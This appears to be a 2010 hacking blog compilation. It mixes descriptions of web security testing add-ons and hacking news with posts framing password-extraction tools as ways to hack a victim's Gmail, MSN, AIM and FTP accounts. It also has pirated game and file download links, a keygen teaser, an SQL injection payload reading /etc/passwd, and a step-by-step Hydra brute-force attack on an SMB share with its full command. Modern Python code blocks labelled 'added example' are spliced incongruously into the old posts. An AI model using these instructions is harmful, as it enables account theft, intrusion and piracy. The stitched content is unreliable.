
Saturday, March 6, 2010

Firefox extension which gives you encryption/decryption and hashing functionalities

Version 4.0
Works with Firefox: 1.5 – 3.0.*
Updated September 24, 2008
Developer Ronald van den Heetkamp
Rating Rated 5 out of 5 stars

FireEncrypter is a Firefox extension which gives you encryption/decryption and hashing functionalities right from your Firefox browser, mostly useful for developers or for education & fun.

The new FireEncrypter is ready! (v-3.0) This version contains the following ciphers:

- AES (Rijndael 128Bit)
- Affine
- Caesar
- XOR
- OTP (One Time Pad)
- Vigenere
- Rail Fence
- Morse Encoder
- MD2 Hashing
- MD5 Hashing
- SHA1 Hashing
- SHA256 Hashing
- SHA384 Hashing
- SHA512 Hashing
- Secure password generator.


Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.

How to hack websites and damage to a web application using Cross-Site Scripting (XSS) vulnerabilities: Its Add-ons for Firefox

Version 0.4.3
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 25, 2009
Developer Security Compass
Rating Rated 5 out of 5 stars

Cross-Site Scripting (XSS) is a common flaw found in today's web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS). It does NOT currently test for stored XSS.

The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.

If the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string.

The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.



How to hack websites using SQL Injection vulnerabilities. Download SQL Inject Me 0.4.4 for free: Its Add-ons for Firefox

Tool 1
Version 0.4.4
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 5, 2009
Developer Security Compass
Rating Rated 4 out of 5 stars

Tool 2
Version 1.3
Works with Firefox: 3.0 – 3.6a1pre
Updated July 21, 2009
Developer danielneto.com
Rating Rated 4 out of 5 stars

SQL Injection vulnerabilities can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is a Firefox extension used to test for SQL Injection vulnerabilities.

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempt to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.


Access-Me: used to test for access vulnerabilities that allow an attacker to access resources without being authenticated

Version 0.2.3
Works with Firefox: 2.0.0.8 – 3.6a1pre
Updated May 5, 2009
Developer Security Compass
Rating Rated 3 out of 5 stars

The current version of Access-Me is an Exploit-Me tool used to test some access vulnerabilities related to web applications. The tool works by sending several versions of the last page request. A request with the session removed will be sent. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.
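
The request variants described above, run against a verb-listed session check and a deny-by-default one, as an added example (not Access-Me's or Security Compass's code). The WSGI app, the `SID` cookie name, the session value and the exact set of five variants are assumptions made for illustration.

```python
from wsgiref.util import setup_testing_defaults

SESSION_ID = "constructed-session-id"   # constructed sample value
VALID_SESSIONS = {SESSION_ID}


def report_app(environ, start_response):
    """Hypothetical protected resource."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"internal report"]


def has_session(environ):
    """True if the request carries a known SID cookie (hypothetical cookie name)."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "SID" and value in VALID_SESSIONS:
            return True
    return False


def deny(start_response, status, headers=()):
    start_response(status, list(headers))
    return [b""]


def verb_listed_auth(app, protected=("GET", "POST")):
    """Weak pattern: the session check is tied to a list of verbs."""
    def middleware(environ, start_response):
        if environ["REQUEST_METHOD"] in protected and not has_session(environ):
            return deny(start_response, "401 Unauthorized")
        # HEAD, SECCOM and any other unlisted verb skip the session check.
        return app(environ, start_response)
    return middleware


def deny_by_default_auth(app, allowed=("GET", "HEAD", "POST")):
    """Hardened pattern: unknown verbs are rejected, every allowed verb needs a session."""
    def middleware(environ, start_response):
        if environ["REQUEST_METHOD"] not in allowed:
            return deny(start_response, "405 Method Not Allowed",
                        [("Allow", ", ".join(allowed))])
        if not has_session(environ):
            return deny(start_response, "401 Unauthorized")
        return app(environ, start_response)
    return middleware


# (method, send session cookie?) -- one reading of the variants the post lists.
VARIANTS = [
    ("GET", False),      # session removed
    ("HEAD", True),      # HEAD verb
    ("SECCOM", True),    # made-up verb
    ("HEAD", False),     # HEAD without session
    ("SECCOM", False),   # made-up verb without session
]


def status_for(app, method, with_session):
    """Call the WSGI app in-process and return the numeric status code."""
    environ = {}
    setup_testing_defaults(environ)
    environ["REQUEST_METHOD"] = method
    environ["PATH_INFO"] = "/report"
    if with_session:
        environ["HTTP_COOKIE"] = "SID=" + SESSION_ID
    seen = []
    app(environ, lambda status, headers, exc_info=None: seen.append(status))
    return int(seen[0].split()[0])


def unauthenticated_successes(app):
    """Verbs that returned 200 although no session cookie was sent."""
    hits = []
    for method, with_session in VARIANTS:
        if not with_session and status_for(app, method, with_session) == 200:
            hits.append(method)
    return hits


if __name__ == "__main__":
    for name, wrap in (("verb-listed", verb_listed_auth),
                       ("deny-by-default", deny_by_default_auth)):
        print(name, unauthenticated_successes(wrap(report_app)))
```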



Simple security audit & Penetration test tool HackBar 1.4.2 download for free: Its Add-ons for Firefox

Version 1.4.2
Works with Firefox: 1.5 – 3.6.*
Updated May 13, 2009
Developer Johan Adriaans
Rating Rated 5 out of 5 stars

# In general
This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what you're doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of Google :)

# The advantages are:
- Even the most complicated urls will be readable
- The focus will stay on the textarea, so after executing the url (ctrl+enter) you can just go on typing / testing
- The url in textarea is not affected by redirects.
- I tend to use it as a notepad :)
- Useful tools like on the fly uu/url decoding etc.
- All functions work on the currently selected text.


# Load url ( alt a )
This loads the url of the current page into the textarea.

# Split url ( alt s )
When this button is clicked, the url/text in the textarea will be split into multiple lines using the ? and & character

# Execute ( alt x, ctrl enter )
This will execute the current url in the textarea. I mostly use ctrl+enter.

# INT -1 ( alt - )
First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.

# INT +1 ( alt + )
Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.

# HEX -1 ( control alt - )
First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.

# HEX +1 ( control alt + )
Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.

# MD5 Hash ( alt m )
This is a standard hashing method, often used as an encryption method for passwords. It will MD5 hash the currently selected string.

# SHA-1/256
This is a standard hashing method, often used as an encryption method for passwords. It will SHA-1/256 hash the currently selected string.

# MySQL CHAR() ( alt y )
If quotes are escaped but you did find an SQL injection that's exploitable, you can use this button to convert, let's say:
load_file('/etc/passwd') --> load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))
Thus omitting the use of quotes to load a file.
You can also use this on
WHERE foo LIKE ('%bar%') --> WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))

# MsSQL CHAR() ( alt q )
Same story as MySQL CHAR(), MsSQL has a slightly different CHAR syntax
--> WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))

# Base64 encode / decode
Base64 encoding ( UU ) is often used to store data (like a return url etc.) This will help you to read those values.

# URLencode / decode
This will encode or decode the currently selected characters to url safe characters. I mostly use it to end a query with # (%23) when in a pseudo path where I can't use /* or --

And lots more ;) Go test it!
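
A defender-side counterpart to the two CHAR() buttons described above, as an added example (not HackBar's code): it decodes MySQL-style and MsSQL-style CHAR() sequences found in URL-encoded query strings, so that strings written without quotes become readable when reviewing request logs. The function names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

# MySQL form:  CHAR(47, 101, 116)
MYSQL_CHAR = re.compile(
    r"CHAR\s*\(\s*\d{1,3}(?:\s*,\s*\d{1,3})+\s*\)", re.IGNORECASE)
# MsSQL form:  CHAR(47) + CHAR(101) + CHAR(116)
MSSQL_CHAR = re.compile(
    r"CHAR\s*\(\s*\d{1,3}\s*\)(?:\s*\+\s*CHAR\s*\(\s*\d{1,3}\s*\))+",
    re.IGNORECASE)


def decode_char_calls(text):
    """Return the strings spelled out by CHAR() sequences, in order of appearance.

    A lone CHAR(n) with a single code is ignored: it is common in
    legitimate SQL and carries no hidden string.
    """
    found = []
    for pattern in (MYSQL_CHAR, MSSQL_CHAR):
        for match in pattern.finditer(text):
            codes = [int(n) for n in re.findall(r"\d+", match.group(0))]
            found.append((match.start(), "".join(chr(c) for c in codes)))
    return [decoded for _, decoded in sorted(found)]


def scan_queries(raw_queries):
    """Return (index, decoded strings) for every query string hiding text in CHAR()."""
    findings = []
    for index, raw in enumerate(raw_queries):
        # unquote_plus turns %2B into '+', which the MsSQL form needs,
        # and a bare '+' into a space, as a web server would.
        decoded = decode_char_calls(unquote_plus(raw))
        if decoded:
            findings.append((index, decoded))
    return findings


# Constructed sample query strings, built from the two conversions shown in
# the HackBar description; quote() produces the URL-encoded form seen in logs.
SAMPLE_QUERIES = [
    "page=2&sort=name",
    "q=" + quote("load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100))"),
    "name=" + quote("foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))"),
]

if __name__ == "__main__":
    for index, strings in scan_queries(SAMPLE_QUERIES):
        print(index, strings)
```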



Core Security Labs researcher Pedro Varangot has released a tool that impersonates a Twitter user's account, enabling an attacker to target that user's followers.

"The initial version executes attacks on Twitter, but Varangot says it can be extended to work against Facebook and other social networks," writes DarkReading's Kelly Jackson Higgins. "The tool is based on Core's Exomind, an experimental Python-based framework written to test social network, search engines, and instant messaging attacks."

"Varangot says the goal is to provide organizations with a tool for social networking security training, penetration testing, or just to show how these attacks could work," Higgins writes.


DoT orders STel to stop services in 3 circles: Security through Compliance OR Compliance through Security ??

DoT orders S Tel to stop services in 3 circles


The question was raised a long time back. Refer to the question below. Is the flaw in the SIM or something else? 7 guys arrested for CDMA cloning. More security gaps awaited...

Posted 10 minutes ago in Linkedin by Pawan Kumar Singh, CISO, Tulip Telecom.

Security through Compliance OR Compliance through Security ??

The new telecom players in India are building up their infrastructure to be rolled out soon to avoid penalty by DoT (Department of Telecommunication). For most of these players Information Security is nowhere on the agenda. Such planning shall obviously create a mess in a very short time and then the realization to build a policy based framework shall strike. There will still be a few players to whom the realization will come only when the legal and regulatory compliance comes to the table. Is it shortsightedness or is it a deliberate mess? Where are the visionary CEOs?

To share you views or Answer question, leave a comment or

S Tel Pvt Ltd, a joint venture between Siva Group (formerly Sterling Infotech Group) and BMIC Limited, a subsidiary of Bahrain Telecommunications Company (Batelco), announced its plans on 16 December, 2009 to launch its GSM mobile services in India. The company will commence operations beginning with the Himachal Pradesh telecom circle where services are expected to be launched soon. Telecom circles for which S Tel has licences are Odisha, Bihar & Jharkhand, Jammu & Kashmir, Assam and North East.


Friday, March 5, 2010

Labour MP Sarah McCarthy-Fry was forced to change her password after the hack attack on the social networking website.

She received a blank message with a link and when she clicked on it, the same message was sent to all 847 people following her account.

It is thought the link contained a virus.

It is thought the virus may be linked to a 'phishing' scam which hackers use to get hold of users' personal details.

Mrs McCarthy-Fry tweeted: 'Apologies to all my followers, I appear to have sent you all a direct message - please note -- it was not me.'

And yesterday she added: 'Password changed so hopefully no more phishing scams.'

As reported in The News, Mrs McCarthy-Fry, MP for Portsmouth North, was the first politician in our area to use Twitter, and she said the hacking incident won't put her off using the site.

'It is where I go for information and news about politics,' she said.

She added: 'Fortunately it was just a blank message sent in my name and not anything else.'


Hacker hits Iowa Homeland Security site

The Iowa Division of Homeland Security and Emergency Management shut down its Web site Wednesday night after a hacker gained access and defaced it, state officials said Thursday.

It was the second serious hacking incident within the past five weeks in state government. On Jan 26, a licensing database of the Iowa Racing and Gaming Commission was breached by a hacker, possibly from China, compromising personal data for 80,000 people.

No sensitive information was compromised within the Division of Homeland Security and Emergency Management, said Lucinda Robertson, an agency spokeswoman. But the Web site remained inaccessible Thursday while a forensic examination was conducted to determine how the breach occurred, she said.

Two other state Web sites — one for veterans and another for individual and family emergency preparedness — were also compromised.

The Iowa Division of Criminal Investigation is participating in the investigation, Robertson said.

Several outside experts said Thursday the two hacking incidents should be a wake-up call for state officials to strengthen their computer security efforts.

"What this does suggest is that maybe state government hasn't put cyber security at the top of their priorities," said Ryan Meyer, president of Meyer Technology Group in Des Moines.


Learn How to Make Key Generators

To all crackers !!!

Well most of you have probably used a key generator or keygen as it is commonly called in internet slang. A keygen is a small program that will generate a key or serial/registration number for a piece of software. It is typically used as an adjunct to software piracy.

Here is a comprehensive guide, strictly for educational purposes, that shows you how a keygen is created to feed the hungry piracy lions.


I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.



Terrorists are pursuing hacking skills: FBI

The Federal Bureau of Investigation (FBI) has raised concern over the usage of internet by international criminals and terror organisations to bolster their attack on countries and their governments.

Speaking at an Internet security conference on Thursday, Mar 4, FBI director Robert Mueller warned about the growing threat of cyber crime and explained how a cyber attack could be as detrimental as a 'well-placed bomb'.


"Terrorists have shown a clear interest in pursuing hacking skills and they will either train their own recruits or hire outsiders with an eye toward combining physical attacks with cyber attacks," Mueller said.

"Apart from the terrorist threat, nation-states may use the Internet as a means of attack for political ends," he added.

Nation-state hackers or mercenaries for hire are seeking US technology, intelligence and intellectual property, along with information on military weapons and strategies, Mueller warned.

Mueller's statement takes on more significance as it comes amid a slew of cyber attacks on government websites and computers.

These range from the hackers in Australia who wanted to protest against an internet filter to the alleged hacking attempts from China targeting Indian government computers.

Internet major Google Inc's allegations of hacking against China have also become an international issue.


Original gameplay for real hackers: Uplink Hackers Elite-Razor1911 download here for free


You play an Uplink Agent who makes a living by performing jobs for major corporations. Your tasks involve hacking into rival computer systems, stealing research data, sabotaging other companies, laundering money, erasing evidence, or framing innocent people.

You use the money you earn to upgrade your computer systems, and to buy new software and tools. As your experience level increases you find more dangerous and profitable missions become available. You can speculate on a fully working stock market (and even influence its outcome). You can modify people's academic or criminal records. You can divert money from bank transfers into your own accounts. You can even take part in the construction of the most deadly computer virus ever designed.

Features:
  • Original gameplay: Players have the opportunity to be freelance hackers.
  • Freeform gameplay: Accept the missions that you want to play.
  • Neuromancer rating: Let your morals guide you; save the net or watch processors melt.
  • Uplink offers two totally different paths to ‘l33t’ hacker status.
  • Exciting missions: Crack a bank, hack a rival into jail, crash the stock market, and get out before you’re caught.
  • Thrilling action: Players have to make those last 15 seconds count and feel the tension rise, as their signal is traced.
  • Deep plot: The computer underground can be a dangerous place, especially if you’ve got to stop the world’s deadliest virus.
  • Choose your OS: Runs on Windows, Mac and Linux.

UPLINK MINIMUM SPECS

• Windows 98, 2000, XP, Vista or equivalent
• 600MHZ processor (1.6GHZ processor recommended)
• 128MB RAM (256MB RAM recommended)
• Geforce2 or greater (Geforce4 or greater recommended)
• 200MB hard disk space



Hackers (1996) OST Original Soundtrack download here for free

* Found link while googling. I have not uploaded these files. PLS REPORT ANY BROKEN LINK on OR leave a comment here *
Download:
  1. http://rapidshare.com/files/77118216/hack.part1.rar
  2. http://rapidshare.com/files/77115586/hack.part2.rar
Password for RAR files: stanley01


Hackers: Outlaws and Angels - Discovery Channel: Download for free here

* Found link while googling. I have not uploaded these files. PLS REPORT ANY BROKEN LINK on OR leave a comment here *

Over the past 20 years a new breed of people has been evolving. They have their own culture, their own technology and their own languages. Among them are pirates and thieves, celebrities and philosophers, lawbreakers and police, heroes and villains. They operate all over the world but their real home is cyberspace. And now there's a conflict in cyberspace between its outlaws and its angels. This is the inside story of the very different missions which now drive the diverse breed of people known to the world as hackers.

DOWNLOAD HERE FULL SERIES

How to bypass a Keylogger: How to fool a Keylogger

These days Agents spy on u everywhere, in college, at work, maybe a trojan virus on your home PC which keylogs your passwords and mails it to someone else. If u think u r being logged, try this:

Whenever u have to type a password, never type the complete password in one go, ie, if your password is WINDOWS, u should type NDOW, then move cursor to start of the password field using the mouse ONLY, then type WI, then move cursor to end using the mouse and type S. This way the logger will record your keystrokes as ndowwis instead of WINDOWS.

Additionally you can also use spaces with your passwords as spaces are not readable. Use 2-3 spaces after or in the end (as prefix) for all your passwords. Gmail, Yahoo and so many other services support spaces in the password field.


How to access blocked websites and How to protect your privacy online using Hotspot Shield

Hotspot Shield is freeware which ensures anonymous and censor-free internet usage. With Hotspot Shield you can even access blocked websites. For example: Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, HotSpot Shield is not an invasive adware or pervasive spyware application.

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. We love the web because of the freedom that it creates to explore, organize, and communicate. Hotspot Shield enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Hotspot Shield. Standard antivirus software protects your computer, but not your web activities.
  • Secure your web session, data, online shopping, and personal information online with HTTPS encryption.
  • Protect yourself from identity theft online.
  • Hide your IP address for your privacy online.
  • Access all content privately without censorship; bypass firewalls.
  • Protect yourself from snoopers at Wi-Fi hotspots, hotels, airports, corporate offices.

Hotspot Shield runs on:
  • Windows 7
  • Windows XP
  • Windows 2000
  • Windows Vista
  • Mac OS X (10.4 Tiger)
  • Mac OS X (10.5 Leopard)
  • Mac OS X (10.6 Snow Leopard)

Thursday, March 4, 2010

How to Recover Password for FTP: Hack FTP Account Passwords if you have physical access to victim's computer

Advanced FTP Password Recovery can be used to recover FTP server password stored by an ftp client. It works with any FTP client including Core FTP, CuteFTP, FileZilla, FlashFXP, SmartFTP, WinSCP, WS_FTP and many others. We guarantee your ftp password recovery provided the ftp password is saved in your FTP client (in other words you are able to login to your FTP server without having to enter the FTP password).


How to use Advanced FTP Password Recovery:
  1. Download FTP Password Recovery
  2. Run the downloaded file and install FTP Password Recovery, make sure you select Run Advanced FTP Password Recovery checkbox at the end of your setup
  3. Open your FTP Client
  4. Open connection properties (e.g. account manager)
  5. Remember current FTP server address. We advise you to write it down
  6. Change FTP server address to localhost. Change port to 21 (or 22, as indicated in Advanced FTP Password Recovery window)
  7. Repeat this for all necessary servers
  8. Confirm changes
  9. Try to connect to each server
  10. You will see captured passwords in Advanced FTP Password Recovery window
  11. Change back the original server addresses in your FTP client
For your convenience and fast recovery we have written detailed step-by-step guides for your specific FTP client:
  • CoreFTP password how-to-guide
  • CuteFTP password how-to guide
  • FileZilla password how-to guide
  • FlashFXP password how-to guide
  • FTP Commander how-to guide
  • SmartFTP password how-to guide
  • WinSCP password how-to guide
  • WS_FTP password how-to guide
Here's a full list of FTP clients that are supported:
  • 3D-FTP recover password
  • AbsoluteTelnet restore password
  • ALFTP retrieve password
  • BitKinex reveal password
  • BulletProof FTP get password
  • Classic FTP see saved password
  • CoffeeCup Direct FTP show password
  • CoffeeCup Free FTP find password
  • CoreFTP forgot password
  • CrossFTP change password
  • cURL passwort
  • CuteFTP intercept password
  • Directory Opus password sniffer
  • ExpanDrive password decrypter
  • FAR Manager password decoder
  • FileZilla password cracker
  • FireFTP password ripper
  • FlashFXP password stealer (local only)
  • Fling FTP password hacker (local only)
  • FTP Commander
  • FTP Explorer
  • FTP Voyager
  • Global Downloader
  • Glub Tech Secure FTP
  • LeechFTP
  • Mosaic
  • NcFTP
  • net2ftp
  • pbFtpClient
  • PSFTP
  • SFTPPlus
  • ScripFTP
  • SmartFTP
  • Sysax FTP Automation
  • WebDrive
  • WinSCP
  • WISE-FTP
  • WS_FTP

Extra recovery features:
  • All versions of FTP clients are supported
  • Support for multiple FTP accounts
  • Works through any Firewall
  • Opens alternative port if port 21 is used by another program
  • Recovery guaranteed!

How to Recover Password for Gmail & Google Talk : Hack Gmail & Google Talk Account Passwords if you have physical access to victim's computer

Password Recovery for Google is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords: Google Talk, Gmail Notifier, Google Desktop, Picasa, Google Photos Screensaver, Internet Explorer and Mozilla Firefox. This cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password.


  • Reveal Google Talk password
  • Decode Google Talk passwords
  • Google Talk password restore
  • Show Google Talk password
  • Google Talk password finder
  • Forgot Google Talk password
  • Google Talk password recovery
  • Change Google Talk password
  • See saved Google Talk password
  • Google Talk passwort anzeigen
  • Google Talk password decrypter
  • How to get Google Talk password
  • Google Talk password cracker (only local data is cracked)
  • Retrieve Google Talk password
  • Rip Google Talk password (only local data files are ripped)
  • Google Talk password hacker (is also illegal)
  • Google Talk password stealer (is illegal)


How to Recover Password for AIM (AOL Instant Messenger): Hack AIM (AOL) Account Passwords if you have physical access to victim's computer

AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PC under the current account. The passwords will then be cracked and decoded (decrypted) to display on the screen in a user-friendly format. Correct passwords will of course be displayed only if you are able to login automatically in AIM without entering your password for the account you want to recover. Works with the latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked.


This tool will be particularly useful when you want to change your AIM password that you forgot. Or if you want to migrate AIM to another PC but you have forgotten your AIM password. Lost AIM passwords have a chance to be recovered!

Functionality of AIM Password Recovery:
  • Decrypt AIM password (AOL Instant Messenger password decrypter)
  • Decode AOL Instant Messenger passwords (AIM password decoder)
  • Crack AOL Instant Messenger passwords (AOL Instant Messenger password cracker)
  • Recover AOL Instant Messenger password (AIM password recovery)
  • Find AIM passwords (AOL Instant Messenger password finder)
  • AOL Instant Messenger password ripper (rip AIM passwords)
  • AIM remote account hacker (not implemented)
  • AOL Instant Messenger password hacker (will hack AIM passwords for saved accounts only on local accounts)
  • AIM password stealer (not implemented) - please note that this tool should not be used to steal others' passwords. This is illegal action and can be prosecuted.
  • AIM password retriever (retrieve AIM passwords)
  • Multiple profiles (screen names) are supported

How to Recover Password for Windows Live: Hack Windows Live Account Passwords if you have physical access to victim's computer

Password Recovery for Windows Live is the tool that will instantly find, decrypt & recover Windows Live passwords that were saved by Windows Live Messenger on your PC under the current login. Extremely useful when you want to change Windows Live password but do not remember your old password. This program is guaranteed to work if you can login with your messenger automatically without entering your password after clicking on the "Sign-In" button. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved on your PC.

Windows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that were saved by Windows Live Messenger on your PC under the current login. This cracker works when you are able to login with your messenger automatically without entering your password. It will recover multiple accounts and supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows 7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved on your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.


How to Recover Password for MSN: Hack MSN, Hotmail Account Passwords if you have physical access to victim's computer

MSN Messenger Password Recovery is the MSN password finder that instantly cracks and decrypts the MSN Passwords and Windows Messenger passwords stored on your computer. It can be used to recover your forgotten MSN password. Program works when the "Remember my Password" tickbox is checked in the messenger and you're able to login automatically without entering your password. All versions of MSN Messenger and Windows Messenger are supported. Multiple accounts are also supported.






Functionality of MSN Password Recovery program:
  • MSN password decrypter (decrypt MSN Messenger password)
  • MSN passwords decoder (MSN password decoder)
  • MSN password cracker (crack MSN Messenger password)
  • Recover MSN Messenger password (MSN password recovery)
  • MSN password finder (find MSN Messenger passwords)
  • MSN Messenger password ripper (rip MSN passwords)
  • MSN password hack (will hack MSN passwords for saved accounts only on local accounts)
  • MSN remote account hacker (not implemented)
  • MSN password stealer (steal MSN messenger passwords) - please note that this tool should not be used to steal others' passwords. This is illegal action and can be prosecuted.
  • MSN password retriever (retrieve MSN password)
  • Multiple profiles (MSN ID's) are supported


We don't need no stinking exploits: Hacking human gullibility with social penetration

Security penetration testers Mike Bailey and Mike Murray rely plenty on attacks that exploit weaknesses in websites and servers, but their approach is better summed up by the famous phrase "There's a sucker born every minute."

That's because so-called social penetration techniques are more reliable and easier to use in identifying chinks in client fortresses, the principals of Mad Security said Wednesday. That's true even for organizations that place a high premium on security and train their employees to resist the most common attempts to trick them into letting down their guard.

"I like finding those elite little exploits where they'll bounce things off eight different websites through cross-site request forgery and cross-site scripting attacks," Bailey said Wednesday at the BSides security conference in San Francisco. "I've never actually needed it in a pentest, because all you have to do is send them a malicious link" or crafty email.

Bailey said he regularly sends client employees emails informing them the strength of their login passwords is being tested through a new website. They are then instructed to follow a link and enter their credentials. The success rate: as high as 50 percent.

The vulnerability stems from humans' inherent tendency to trust one another. Survival over the millennia largely depended on their ability to work in groups. When one person saw that a group of his peers ate a particular berry and didn't die, he ate the same fruit - and survived as a result. Hackers who understand this trait can exploit it to access companies' most precious assets.

"The social part of our industry, we are never going to patch," Murray said. "We need to have our whole industry understand this. This is what all social attacks are about."

During their hour-long talk, the pair described the most common social penetration methods, which can be found in everything from 419 email scams to trojan attacks that succeed only when a victim clicks on a malicious link.

The come-ons often invoke a sense of urgency, such as an opportunity to make money only if the mark moves quickly. Scammers often try to form perceived bonds with their victims by thanking them for their attention or apologizing for an interruption. The ruses amount to hacks that suspend the marks' critical faculties just long enough to get them to make a critical mistake.

Bailey employed a similar trick last year, when he and two other ethical hackers claimed a $10,000 prize for breaking into the email account of StrongWebMail CEO Darren Berkovitz.

The XSS, or cross-site scripting, vulnerability they identified could only be exploited if the victim clicked on a link while logged in to his account. The solution: They sent him an email with the subject line "we think we've already won this contest," with the attack link in the body. Berkovitz took the bait, and they won the prize.

The technique works even on firms and individuals that regard themselves as especially security savvy, although the tricks often must be tailored to them, Murray warned.

"They spend all this time talking about security," he explained. "If I send them an email saying 'Do the right thing for security,' they say OK, and we own them. The things that normally work in most organizations don't work on them, but if you figure out what works on them, they're as easy to own as anybody else, no matter how intense their preparation is."


New Hacking Trend: Cybercrime Goes Virtual. Hackers are employing phishing attacks to snare access data for user accounts for online role-playing game

Cybercrime is going virtual. Hackers are employing phishing attacks to snare access data for user accounts for online role-playing games. They then use the plundered passwords to transfer away virtual swords and other gear. Because the objects often demand a great deal of time to earn, once stolen they can then be resold for a significant profit.

Computer gamers are increasingly finding that there's a serious side to their virtual fun: their hard-earned virtual objects are being stolen from them, and in some cases their entire game as well.

The trend was first reported in an article by Hamburg-based Computer Bild magazine. On the one hand, hackers are employing phishing attacks to snare access data for user accounts for online role playing games.

They then use the plundered passwords to transfer away virtual swords and other gear. Because the objects often demand a great deal of time to earn, once stolen they can then be resold for a significant profit.

The magazine also notes that hackers are trying to steal entire games. Many titles require gamers to register online for copyright protection purposes.

If hackers can sniff out the passwords, they can then assume control of the account and by extension the game itself. If the hacker then changes the access data, the original purchaser can no longer access his or her own user account and is shut out from playing the game.

One trick used to spy on users' passwords is the so-called "drive-by download." Hackers lure players to a rigged Web site by promising additional functionality in the game.

But the software offered for download there actually contains a Trojan that allows hackers to spy on the infected computer. Sometimes security holes in the browser are also exploited to sneak the malicious software onto the host computer.

SOURCE: News Factor


Wednesday, March 3, 2010

How to use Hydra tool: Identify Open Shared Resources from open port 139 using software Hydra

The Hydra application will scan a range of IP addresses and identify any open shares from open port 139. Open shares are shares without passwords assigned to them, of which the majority allows anyone to copy, move, delete, and quite often add to the share. Not all shares are left unprotected and Hydra has the ability to brute-force its way into the share given a username and password list combination.

From the directory containing the compressed Hydra files type tar -zxvf hydra-5.0-src.tar.gz.

The files will uncompress into a new directory named hydra-5.0-src. Change to the new directory by typing cd hydra-5.0-src and pressing Enter.

Hydra needs to be built for the specific machine it is on. Type ./configure to prepare the build for that machine, then type the make command to compile Hydra.
The make command will execute and attempt to build xhydra, the graphical front end for Linux X. To start Hydra in X type:

./xhydra
Change the Single target to the new target. Change the Port from Cisco to 139. (After all, we are looking for SMB Shares). Select the Show Attempts and Be Verbose options.

Select the Passwords tab and change the Username. Change the password to either a specific password for the account or to a password file. There are applications designed to create password files, but if you need to create one manually, simply create a text file in the directory containing Hydra with one password per line.
Click Start. The results will be displayed. Hydra will attempt each password from the password file for the username given. If the correct password is in the file, Hydra will let you know. In this example, the password for the username kermit is 123.

Now our next step will be to create a directory that Linux can associate with the target’s share by typing:

mkdir hacker
Next is to mount the shared directory on the target. You can find out the share name (Personal) using the LANguard application.
Type in the username for the share.

Type in the password for the share. Verify that the Linux machine can view the contents of the target’s shared folder.

By looking at the shared directory on the target we can verify that the Linux machine is actually looking at the contents of the share on the target.

If xhydra will not install on your version of Linux, you would type:

./hydra 172.16.1.40 smb -s 139 -v -V -l kermit -P passwordlist1 -t 36

The results from the command line are identical to the xhydra.
*Note: There are literally thousands of open shares existing on the Internet, and thousands of those are left unprotected unintentionally. One of the biggest reasons for this is that the owner is not educated in the area of security and is dependent upon his or her ISP or even the router “out-of-the-box” for their security needs.
